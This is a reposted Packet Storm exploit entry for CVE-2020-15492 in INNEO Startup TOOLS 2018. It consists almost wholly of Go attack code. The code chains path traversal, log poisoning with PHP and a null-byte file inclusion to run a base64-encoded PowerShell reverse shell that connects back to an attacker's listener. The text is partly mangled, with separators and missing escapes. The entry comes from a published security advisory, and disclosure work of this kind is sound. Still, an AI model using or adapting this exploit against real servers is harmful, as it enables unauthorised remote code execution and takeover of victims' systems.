
Published on July 30th, 2020 📆 | 8374 Views ⚑


INNEO Startup TOOLS 2018 M040 Remote Code Execution ≈ Packet Storm

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[*]# Exploit Title: INNEO Startup TOOLS 2018 M040 - Remote Code Execution[*]# Date: 2020-07-23[*]# Exploit Author: Patrick Hener, SySS GmbH[*]# Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload[*]# Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt)[*]# Vendor Homepage: https://www.inneo.co.uk/en/home.html[*]# Version: Startup TOOLS 2017/2018[*]# Tested on: Windows 10 x64[*]# CVE : CVE-2020-15492

/* This exploit was written by Patrick Hener, SySS GmbH[*]*/

package main

import ([*]"encoding/base64"[*]"fmt"[*]_ "fmt"[*]"io"[*]"io/ioutil"[*]"log"[*]"net"[*]"net/http"[*]"net/url"[*]"os"[*]"regexp"[*]"strconv"[*]"strings"


type progress struct {[*]bytes uint64[*]}

func usage() {[*]fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] nn", os.Args[0])[*]os.Exit(2)[*]}

func readFile(target string, traversal string, path string) (bool, string) {[*]success := true[*]request := fmt.Sprintf("%s%s%s", target, traversal, path)[*]resp, err := http.Get(request)[*]if err != nil {[*]fmt.Println(err)[*]}[*]if resp.Status != "200 OK" {[*]success = false[*]}

defer resp.Body.Close()[*]body, err := ioutil.ReadAll(resp.Body)[*]if err != nil {[*]fmt.Println(err)[*]}

return success, string(body)[*]}

func triggerFile(target string, traversal string, path string) {[*]request := fmt.Sprintf("%s%s%s", target, traversal, path)[*]_, _ = http.Get(request)[*]}

func poison(target string, traversal string, path string) (bool, string) {[*]success := true[*]request := fmt.Sprintf("%s%s%s", target, traversal, path)[*]resp, err := http.Get(request)[*]if err != nil {[*]fmt.Println(err)[*]os.Exit(2)[*]}[*]if resp.Status != "404 Not Found" {[*]success = false[*]}

defer resp.Body.Close()

fmt.Printf("[*] Poisoned: %sn", path)

body, err := ioutil.ReadAll(resp.Body)[*]if err != nil {[*]fmt.Println(err)[*]}

return success, string(body)[*]}

func parseHostname(body string) string {[*]re := regexp.MustCompile("Service hostname:?.*")[*]hostnameRaw := re.FindAllString(body, -1)[*]hostnameSplit := strings.Split(hostnameRaw[0], ":")[*]hostnameTrimmed := strings.TrimSpace(hostnameSplit[1])[*]hostnameNoNewline := strings.Replace(hostnameTrimmed, "n", "", -1)

return hostnameNoNewline[*]}

func customEscape(sequence string) string {[*]output := url.PathEscape(sequence)[*]output = strings.Replace(output, "+", "%20", -1)[*]output = strings.Replace(output, "=", "%3D", -1)

return output[*]}

func payloadEscape(sequence string) string {[*]output := url.PathEscape(sequence)[*]output = strings.Replace(output, "=", "%3D", -1)

return output[*]}

func transferStreams(con net.Conn) {[*]c := make(chan progress)

// Read from Reader and write to Writer until EOF[*]copy := func(r io.ReadCloser, w io.WriteCloser) {[*]defer func() {[*]r.Close()[*]w.Close()[*]}()[*]n, err := io.Copy(w, r)[*]if err != nil {[*]fmt.Printf("[%s]: ERROR: %sn", con.RemoteAddr(), err)[*]}[*]c < - progress{bytes: uint64(n)}[*]}

go copy(con, os.Stdout)[*]go copy(os.Stdin, con)

p := < -c[*]fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been receivedn", con.RemoteAddr(), p.bytes)[*]p = <-c[*]fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sentn", con.RemoteAddr(), p.bytes)[*]}

func startServer(addr string) {[*]ln, err := net.Listen("tcp", addr)[*]if err != nil {[*]log.Fatalln(err)[*]}[*]fmt.Printf("[+] Now listening on %sn", addr)[*]con, err := ln.Accept()[*]if err != nil {[*]log.Fatalln(err)[*]}[*]fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. Enjoy your shell, good sir.n", con.RemoteAddr())[*]transferStreams(con)[*]}

func stage1(target string, traversal string, installDir string) string {[*]fmt.Printf("[*] Attacking target %s with assumed install path %sn", target, installDir)[*]fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.logn", target, traversal, installDir)[*]path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir)[*]success, response := readFile(target, traversal, path)[*]if !success {[*]fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.n", target, traversal, installDir)[*]os.Exit(2)[*]}[*]hostname := parseHostname(response)

return hostname[*]}

func stage2(target string, traversal string, installDir string, payloadFinal string) {[*]/* Stage 2 - poison log with php payload[*]Special about that is the length of payload junk has max restriction of about 200 characters[*]Thus we are splitting up the payload escaping the trash we don't need like[*]the 'n' is nesessary to escape DRIVE: which will be DRIVE:n then[*]< ?php $cmd=''; $foo= '[*]n'; $cmd.="part1"; $foo='[*]n'; $cmd.="part2"; $foo='[*]....[*]n'; system(cmd); ?>[*]*/[*]fmt.Println("[*] Poisoning Log with payload")[*]/* Start of the php code */[*]start := customEscape("< ?php $cmd=''; $foo='")[*]success, _ := poison(target, traversal, start)[*]if !success {[*]fmt.Println("Poisoning failed. Exiting")[*]os.Exit(2)[*]}

/* Looping through payload */[*]offset := 0[*]pre := "n'; $cmd.='"[*]post := "'; $foo='"

for offset < len(payloadFinal) {[*]payload := payloadFinal[offset : offset+150-len(pre)-len(post)][*]poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post))[*]success, _ = poison(target, traversal, poisonPath)[*]if !success {[*]fmt.Println("Poisoning failed. Exiting")[*]os.Exit(2)[*]}[*]offset += 150 - len(pre) - len(post)

if len(payloadFinal)-offset < = 150-len(pre)-len(post) {[*]break[*]}[*]}

/* Send last slice of payload to prevent from out of range error */[*]payload := payloadFinal[offset:len(payloadFinal)][*]poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post))[*]success, _ = poison(target, traversal, poisonPath)[*]if !success {[*]fmt.Println("Poisoning failed. Exiting")[*]os.Exit(2)[*]}

/* End of the php code */[*]end := customEscape("n'; system($cmd); die; ?>")[*]success, _ = poison(target, traversal, end)[*]if !success {[*]fmt.Println("Poisoning failed. Exiting")[*]os.Exit(2)[*]}[*]}

func stage3(target string, traversal string, installDir string, hostname string) {[*]logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\0.php", target, traversal, installDir, hostname)[*]fmt.Printf("[*] Triggering inclusion of %sn", logFile)[*]triggerFile(target, traversal, logFile)[*]}

func stage4(lhost string, lport int) {[*]/* Listen for socket connection */[*]addr := fmt.Sprintf("%s:%d", lhost, lport)[*]fmt.Printf("[*] Starting reverse listener at %sn", addr)[*]startServer(addr)[*]}

func main() {[*]if len(os.Args) < 4 {[*]usage()[*]}

lhost := os.Args[1][*]lport, err := strconv.Atoi(os.Args[2])[*]if err != nil {[*]fmt.Println("lport has to be numeric")[*]os.Exit(2)[*]}[*]target := os.Args[3][*]var installDir string[*]if len(os.Args) == 4 {[*]installDir = "PROGRA~2/stools"[*]} else {[*]installDir = os.Args[4][*]}

/* Payload definition */[*]payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport)[*]/* Convert to base64 UTF-16LE */[*]encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()[*]payloadEncoded, _ := encoder.String(payload)[*]payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded))[*]/* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand */[*]payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString)

/* Traversal to root - default depth would be 4 */[*]traversal := "/../../../../../../../../../../"

/* stage 1 - get hostname */[*]hostname := stage1(target, traversal, installDir)[*]fmt.Printf("[+] Hostname of target is: %sn", hostname)[*]/* stage 2 - poisoning */[*]stage2(target, traversal, installDir, payloadFinal)[*]/* stage 3 - trigger */[*]go stage3(target, traversal, installDir, hostname)[*]/* stage4 - start listener */[*]stage4(lhost, lport)[*]}[*]

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